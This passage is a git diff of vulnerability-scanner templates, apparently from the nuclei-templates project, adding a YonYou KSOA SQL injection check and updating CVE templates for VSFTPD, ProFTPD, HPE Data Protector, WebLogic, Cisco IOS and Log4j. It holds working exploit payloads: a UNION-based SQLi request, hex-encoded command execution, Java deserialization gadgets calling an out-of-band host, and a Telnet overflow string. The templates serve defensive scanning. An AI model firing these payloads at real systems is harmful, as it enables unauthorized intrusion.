+  name: YonYou KSOA common/dept.jsp - SQL injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="用友-时空KSOA"
+  tags: yonyou,oa,sqli,ksoa
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '0x{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100922859f664e4119692c97837afcf0e55f50952e31ba4d106bfced7a702cde4c3022100db43d0d8ca69943f8ecf515a9ee9e142599c9d652ffef759f0238a20f7056e2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml
index a3ba1c7377..ec8cf0aa8f 100644
--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server.
   remediation: |
     Update to the latest version of VSFTPD, which does not contain the backdoor.
   reference:
@@ -48,4 +50,4 @@ tcp:
         part: raw
         regex:
           - "root:.*:0:0:"
-# digest: 490a004630440220377db47bc7be4abf4cf962ba3a1e2d81234243a9c41303ab5fe66fc7b6b1cfeb02200e542b249d34b568ebe06a87dc58d1aae7696294d222625c0388267af274d1a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c66d6520e1172acbc6c17f419b6323b3f6115d3e2094e1992198e599acb56105022100af9893cdee0cb6ff1d47050169777aaf364458fd08b264c95a953b0505ccfc81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml
index 10bd304d45..afe13ceb48 100644
--- a/network/cves/2015/CVE-2015-3306.yaml
+++ b/network/cves/2015/CVE-2015-3306.yaml
@@ -5,13 +5,15 @@ info:
   author: pdteam
   severity: critical
   description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
+  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
   reference:
     - https://github.com/t0kx/exploit-CVE-2015-3306
     - https://www.exploit-db.com/exploits/36803/
     - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
     - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
     - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
-  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
   classification:
     cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
     cvss-score: 10
@@ -45,4 +47,4 @@ tcp:
         part: raw
         words:
           - "Copy successful"
-# digest: 4a0a0047304502206e4bbacac7407e920b69b12bf1aacc542accbac3da13c2629ef972c3ce196a1f0221009930383e17cc9739da76a80ff0385edeca9954e833de43678ce3e5f6ebb3c02f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d6ac5dfea8da9853cbc6fe55a2803f210dc06a967262d008e362d35db82907f4022100e6c3e3ad827d5668b421453cd0861f508c789f00b2c5407f6eff69978b038fd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml
index 89662d494d..35d62d50ff 100644
--- a/network/cves/2016/CVE-2016-2004.yaml
+++ b/network/cves/2016/CVE-2016-2004.yaml
@@ -5,30 +5,32 @@ info:
   author: pussycat0x
   severity: critical
   description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
+  remediation: |
+    Upgrade to the most recent version of HP Data Protector.
   reference:
     - https://www.exploit-db.com/exploits/39858
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
     - http://www.kb.cert.org/vuls/id/267328
     - https://www.exploit-db.com/exploits/39858/
     - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
-  remediation: |
-    Upgrade to the most recent version of HP Data Protector.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-2004
     cwe-id: CWE-306
-    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
     epss-score: 0.06793
+    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    product: data_protector
+    max-request: 2
     vendor: hp
+    product: data_protector
   tags: cve,cve2016,network,iot,hp,rce,edb
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 5555
+      - "{{Host}}:5555"
     inputs:
       - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
         type: hex
@@ -37,4 +39,4 @@ tcp:
         encoding: hex
         words:
           - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
-# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210090366fdc2d1fd6c027afaa1d7e811083cddf24d409d8e1657508a0e40fd0091302203ef79c64f6a0ea3cc6759f410b9d8f95051d0c8c2a6ff5bf9328ea2f1d168187:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml
index 4a2d311208..2a35c07609 100644
--- a/network/cves/2016/CVE-2016-3510.yaml
+++ b/network/cves/2016/CVE-2016-3510.yaml
@@ -6,10 +6,12 @@ info:
   severity: critical
   description: |
     Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
-  reference:
-    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
+  reference:
+    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -17,7 +19,6 @@ info:
     cwe-id: CWE-119
     epss-score: 0.0162
   metadata:
-    max-request: 1
     verified: true
   tags: cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network
 
@@ -27,18 +28,27 @@ variables:
 
 tcp:
   - inputs:
-      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
-        read: 1024
-      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"
+      - data: "t3 12.2.1
 
+          AS:255
+
+          HL:19
+
+          MS:10000000
+
+          PU:t3://us-l-breens:7001
+
+          \n"
+        read: 1024
+
+      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"
     host:
       - "{{Hostname}}"
-    port: 7001
+      - "{{Host}}:7001"
     read-size: 4
-
     matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
-# digest: 4a0a00473045022100b59e17c2b1234b0e0a0ddaeb32c1d08a72859734450a3985a9b6bcd86ac7a95602205ecfc93a97894c83bba825ce2160a3533de7c1427aa1a79818d264f51704812b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205872df5dcb720ef582b6fe129e1f7e9697660f3fcf4f953639f7a90d12adc6b402203da03c30abfc392fd04b42f0370868d07690c6d81d398250829ceff8584f7ef0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml
index a6fc19fd7e..560abff103 100644
--- a/network/cves/2017/CVE-2017-3881.yaml
+++ b/network/cves/2017/CVE-2017-3881.yaml
@@ -6,29 +6,31 @@ info:
   severity: critical
   description: |
     A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
+  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
   reference:
     - https://github.com/artkond/cisco-rce
     - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
     - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
     - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
     - http://www.securitytracker.com/id/1038059
-  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-3881
     cwe-id: CWE-20
-    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
     epss-score: 0.97332
+    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    product: ios
+    max-request: 2
     vendor: cisco
+    product: ios
   tags: cve,cve2017,cisco,rce,network,kev,msf
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 22
+      - "{{Host}}:23"
     inputs:
       - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
         read: 1024
@@ -40,4 +42,4 @@ tcp:
       - type: word
         words:
           - "Current privilege level is"
-# digest: 4b0a0048304602210084ac6fdf577ec3d61ae68ca05788045936f72497069267299d0d71a19cab5bbd022100eec27078f8064664cf93fc3587d0610917066eadc34c579f3f63b9262d652ef1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ae2a53557fd0885a83941cf05f8edd24a847e2f06e13a433f5d164b5a7d034ec022100c11b711ecc07817b98cb496ec8961da1c4befe3558a1f40c610e09baaf7ad141:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml
index eb785332d8..aad7d9a325 100644
--- a/network/cves/2017/CVE-2017-5645.yaml
+++ b/network/cves/2017/CVE-2017-5645.yaml
@@ -6,32 +6,34 @@ info:
   severity: critical
   description: |
     In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
+  impact: |
+    Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server.
+  remediation: |
+    Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
     - https://nvd.nist.gov/vuln/detail/CVE-2017-5645
     - http://www.openwall.com/lists/oss-security/2019/12/19/2
     - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
     - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
-  remediation: |
-    Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-5645
     cwe-id: CWE-502
-    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
     epss-score: 0.74805
+    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    product: log4j
+    max-request: 2
     vendor: apache
+    product: log4j
   tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
 variables:
   end: "\r\n"
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 4712
+      - "{{Host}}:4712"
     inputs:
       - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}"
     read-size: 100
@@ -40,4 +42,4 @@ tcp:
         part: interactsh_protocol
         words:
           - dns
-# digest: 4a0a0047304502204a51aa9b8a19d34f9af70d052c24471c653df726a06f72d4aca42ef52ea37771022100c8d623ab0d79bfc99ac193f02266f71802f868649c64997c36c480e9142041af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b2fc5febe223c3e79bd88795aeb0e1a0d2f84ad8e1e2031e3b7a62eb48ec6c3302200b4be8d0271e57b8ad568475c83d22afb408a06cf94d3436d4f47ab4f455aba8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml
index 91365bc007..3f4bce9eb3 100644
--- a/network/cves/2018/CVE-2018-2628.yaml
+++ b/network/cves/2018/CVE-2018-2628.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability can lead to arbitrary code execution with the privileges of the WebLogic server, potentially compromising the entire system.
   remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
   reference:
     - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
@@ -43,4 +45,4 @@ tcp:
       - type: regex
         regex:
           - "\\$Proxy[0-9]+"
-# digest: 4b0a00483046022100ee5ff47973ccc93562ac2636767c947822e406cedc01fc03309e19162f263cce022100ec39b6e9ea21990e0d688d5b0fce869fc7185ea8170e02cba9c656e38fe9b570:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022064414b06c74b8e994eda63f324c71ebc7ba13bcfd5449e732f1fb1b5971a778702205cf01f8103410e5f8573befeddb87a05a257468f5b8dee1452ec3ff11241fce1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml
index 81199712bb..ab5ab965ce 100644
--- a/network/cves/2018/CVE-2018-2893.yaml
+++ b/network/cves/2018/CVE-2018-2893.yaml
@@ -6,43 +6,54 @@ info:
   severity: critical
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+  remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
   reference:
     - https://www.anquanke.com/post/id/152164
     - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
     - https://nvd.nist.gov/vuln/detail/CVE-2018-2893
     - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
-  remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-2893
     epss-score: 0.97346
   metadata:
-    max-request: 1
+    max-request: 2
   tags: cve,cve2018,weblogic,network,deserialization,rce,oracle
-
 tcp:
   - inputs:
+      - data: "t3 12.2.1
 
-      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
+          AS:255
+
+          HL:19
+
+          MS:10000000
+
+          PU:t3://us-l-breens:7001
+
+          \n"
         read: 1024
+
       - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078"
         type: hex
         read: 1024
-      - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff"
-        type: hex
-        read: 1024
+
       - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff"
         type: hex
         read: 1024
 
+      - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff"
+        type: hex
+        read: 1024
     host:
       - "{{Hostname}}"
-    port: 7001
-
+      - "{{Host}}:7001"
     matchers:
       - type: word
         part: raw
         words:
           - "StreamMessageImpl cannot be cast to weblogic"
-# digest: 490a0046304402203ea37b0b132b17e52ea2d61bee2c14e103ed8ad7e46df28a2bfb7c26e865b4d902206d008827a0a0f04333bfc6ae913425a87c0a1eaae8465a20c22e1774aabe8a76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b26d01af07702e54bc0b69ce1028180f9a9e874fad6ef6a5218ce4763b07eac6022067cdc6dd57cf3d080e0f5ee1040f6d563534b2c7e560d59b13c15677e59e5661:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml
index 3d1ea89146..c108d3f8b6 100644
--- a/network/cves/2020/CVE-2020-11981.yaml
+++ b/network/cves/2020/CVE-2020-11981.yaml
@@ -6,10 +6,12 @@ info:
   severity: critical
   description: |
     An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
+  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
   reference:
     - https://github.com/apache/airflow/pull/9178
     - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
